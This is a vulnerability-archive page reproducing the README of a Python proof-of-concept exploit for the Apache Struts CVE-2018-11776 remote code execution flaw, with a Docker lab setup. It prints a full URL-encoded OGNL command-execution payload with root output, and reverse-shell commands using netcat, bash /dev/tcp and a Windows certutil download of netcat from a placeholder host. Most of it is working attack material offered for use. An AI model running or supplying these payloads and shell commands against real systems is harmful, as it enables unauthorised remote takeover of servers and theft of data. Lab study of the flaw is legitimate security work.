关联漏洞
标题:
Apache Struts 输入验证错误漏洞
(CVE-2018-11776)
描述:Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。Apache Struts 2是Apache Struts的下一代产品,是在Struts 1和WebWork的技术基础上进行了合并的全新Struts 2框架,其体系结构与Struts 1差别较大。 Apache Struts 2.3版本至2.3.34版本和2.5版本至2.5.16版本中存在输入验证漏洞
描述
Working Python test and PoC for CVE-2018-11776, includes Docker lab
介绍
# CVE-2018-11776-Python-PoC
hook-s3c (github.com/hook-s3c), @hook_s3c on twitter
Working Python test and PoC for CVE-2018-11776, originally appearing on;
https://github.com/hook-s3c/CVE-2018-11776-Python-PoC
## What's going on?
Man Yue Mo from Semmle has disclosed an Struts2 RCE vulnerability, delivered in a payload encoded in the URL path of a request.
Versions affected are 2.3 to 2.3.34, and 2.5 to 2.5.16.
Default configuration is not vulnerable, but if misconfigured... F.
## Set up your docker instance
exploit will work fine with the docker container build for cve-2017-5638
(struts2-showcase-2.3.12)
```
$ docker pull piesecurity/apache-struts2-cve-2017-5638
$ docker run -d --name struts2 -p 32771:8080 piesecurity/apache-struts2-cve-2017-5638
```
## Set up your weakened configuration
```
$ apt-get install vim
$ vim /usr/local/tomcat/webapps/ROOT/WEB-INF/classes/struts.xml
```
add the configuration below;
```
<action name="help">
<result type="redirectAction">
<param name="actionName">date.action</param>
</result>
</action>
```
and also;
```
<struts>
<constant name="struts.mapper.alwaysSelectFullNamespace" value="true" />
```
restart your tomcat and/or container
```
$ /usr/local/tomcat/bin/shutdown.sh
```
## Verify that target is vulnerable
test the url to see if a redirect and evaluation occurs;
http://0.0.0.0:32771/${2+2}/help.action > http://0.0.0.0:32771/4/date.action
with the test script;
```
$ ./exploitS2-057-test.py http://0.0.0.0:32771/showcase.action
testing the url for exploit; http://0.0.0.0:32771/${12612+24867}/help.action
URL http://0.0.0.0:32771/showcase.action s2-057 CVE-2018-11776 is vulnerable!
```
## Execute commands PoC
```
$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'id'
[Execute]: id
[Url]: http://0.0.0.0:32771/%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.%28%23cmd%3D%27id%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27c%27%2C%23cmd%7D%3A%7B%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/help.action
uid=0(root) gid=0(root) groups=0(root)
```
## Reverse shell
get your box ready to accept the reverse shell;
```
$ netcat -lvp 31337
```
run the script;
```
# you'll want to install netcat
$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'apt-get install netcat -y'
# now pop that shell
$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'netcat -e "$SHELL" 172.17.0.1 31337'
```
replace 32771 with your exposed container port
## Updated method via Bash, forward-slashes now supported.
```
$ netcat -lvp 31337
```
```
$ ./exploitS2-057-cmd.py 0.0.0.0:32771 "/bin/bash -i >& /dev/tcp/172.17.0.1/31337 0>&1"
```
## Windows reverse shell (untested)
```
# grab netcat binary
# https://stackoverflow.com/questions/28143160/how-can-i-download-a-file-with-batch-file-without-using-any-external-tools
$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'certutil.exe -urlcache -split -f "https://yourhostingservice.1337/files/netcat.exe" nc.exe'
# execute
$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'nc.exe 172.17.0.1 31337 –e cmd.exe'
```
-----------------
# Debug hell (notes)
All requests with a forward-slash (/) will fail because Tomcat actively blocks these, you may need to work around this, for example using environment variables for /bin/bash as $SHELL in the example above.
- https://stackoverflow.com/questions/9719224/coding-forward-and-backward-slashes-in-tomcat-7
- http://engineering.widen.com/blog/tomcat-slashes/
With this in mind, the windows /c flag will not work as expected. I've only tested this on the docker container.
## Update
Thanks to @Menin_TheMiddle for showing that the forward-slash issue can be resolved, the code now supports forward-slashes and so a reverse shell without netcat via bash is now also possible, also now supports Windows instances (untested).
# Mitigation
Patch your Struts, or simply don't use it.
I guess you can always sell identify fraud products if you happen to have a breach and all your customer details are leaked! (you know who you are, absolute scum)
# Credit
Thanks to ;
- Man Yue Mo, Semmle for disclosing the vulnerability (https://semmle.com/news/apache-struts-CVE-2018-11776)
- piesecurity for the Dockerfile lab and example of OGNL payload (https://github.com/piesecurity/apache-struts2-CVE-2017-5638)
- xfox64x for the write-up on the method (https://github.com/xfox64x/CVE-2018-11776)
- jiguang7 for the test (https://github.com/jiguang7/CVE-2018-11776)
- @Menin_TheMiddle for the writeup (https://www.secjuice.com/apache-struts2-cve-2018-11776/) and putting me in my place :) code now finally supports windows and bash reverse shell
# Greetz
shout out to vap0rsquad!!! sH3llG0d - Willow - D@3M0¢π1 - n4t4s - 23pieces
文件快照
[4.0K] /data/pocs/be908463b542c2c1803b4d7a3e5146c52efc2407
├── [ 236] Dockerfile
├── [1.6K] exploitS2-057-cmd.py
├── [2.3K] exploitS2-057-test.py
├── [5.1K] README.md
└── [ 12M] struts2-showcase-2.3.12.war
0 directories, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。